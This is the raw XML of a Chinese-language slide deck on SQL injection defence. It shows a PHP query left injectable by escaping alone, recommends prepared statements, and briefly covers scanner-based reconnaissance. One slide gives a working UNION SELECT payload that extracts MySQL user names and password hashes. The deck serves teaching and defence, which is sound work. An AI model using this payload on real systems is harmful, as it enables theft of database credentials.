                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="265"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26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6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2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="265" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="264"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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4221931" y="2409824"/>
            <a:ext cx="425455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正确的防御SQL注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="269" name="Shape 269"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3687762" y="4779167"/>
            <a:ext cx="562676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elvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>1.找到所有的SQL注入漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>2.修补这些漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="270" name="Shape 270"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4614861" y="3032917"/>
            <a:ext cx="3771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如何有效的防御？</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68"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">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70"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="10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69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="17"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P build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="270" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="269" grpId="3"/>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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="935036" y="2870199"/>
            <a:ext cx="10079040"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一般会这样防御，比如只对用户的输入做一些escape处理，这是不够的。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273" name="Shape 273"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1062037" y="474424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举个例子：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274" name="Shape 274"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1003300" y="5789612"/>
            <a:ext cx="9944100"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C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>$ sql = “SELECT id, name , mail, cv ,blog,tieitter FORM register WHERE id=”.mysql_real_escape_string($_GET[‘id’]);</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72"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">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73"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="27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274"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="17"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3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="273" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="272"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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2194661" y="286542"/>
            <a:ext cx="8615477" cy="401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Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>mysql_real_escape_string()仅仅会转义：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>\r</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>\n</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>NULL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Control-Z</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="277" name="Shape 277"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3878821" y="4268787"/>
            <a:ext cx="549957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想到绕过的payload了吗？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="278" name="Shape 278"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="768349" y="6553199"/>
            <a:ext cx="11720515"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Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>http://www.sysoremxyz/test.php?id=12,AND, 1=0,UNION,SELECT,1,CONCAT(user,0x3a,password)3,4,5,6,from,mysql.user,where,user=substring_index(current_user(),char(64),1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="279" name="Shape 279"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="710963" y="5757861"/>
            <a:ext cx="229917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payload：</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76"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="276"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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77"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="277"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="27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lt" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="279"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="279"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="27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lt" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="24" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="278"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="278"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="276" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="279" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="278" grpId="4"/>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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4730750" y="1599405"/>
            <a:ext cx="3314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几种有效的方法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="282" name="Shape 282"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4590053" y="3187699"/>
            <a:ext cx="3823107" cy="427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Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>1.使用预编译语句</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>2.使用存储过程</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>3.检查数据类型</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>4.使用安全函数</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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4845050" y="1386680"/>
            <a:ext cx="3314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使用预编译语句</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285" name="Shape 285"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1901824" y="2795586"/>
            <a:ext cx="9199565"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Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>一般来说，防御SQL注入的最佳方式，就是使用预编译语句，绑定变量。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="286" name="Shape 286"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4995207" y="8359775"/>
            <a:ext cx="301279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Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>php中绑定变量例子</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287" name="Shape 287"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="573086" y="4130675"/>
            <a:ext cx="11858284" cy="410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rgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>$query = “INSERT INTO myCity (Name, CountryCode,District) VALUES (?,?,?)”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2900">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>$stmt = $mysqli-&gt;prepare($query);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2900">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>$stmt-&gt;bind_param(“sss”,$val1,$val2,$val3);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2900">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>$val1 = ‘Stuttgart’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2900">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>$val2 = ‘DEU’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2900">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>$val3 = ‘Baden-Wuerttemberg’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2900">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>/* Execute the statement */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2900">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>$stmt-&gt;execute();</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84"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">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lt" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="11" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="285"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="285"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28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 grpId="3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="287"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="287"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="284" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="285"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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523874" y="362742"/>
            <a:ext cx="11501440"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mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>1.信息搜集：</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>利用AWVS、w3af等工具对网站进行综合性扫描搜集相关信息，包括但不限于Web应用程序的编程语言、服务器软件信息、操作系统信息等</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Shape 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1284556" y="5147467"/>
            <a:ext cx="9980074" cy="2552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Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>利用awvs扫描得到如下一些信息：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>操作系统：Win 2K8 Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>服务器软件：微软的IIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>…  …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="image1.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3086100" y="2706545"/>
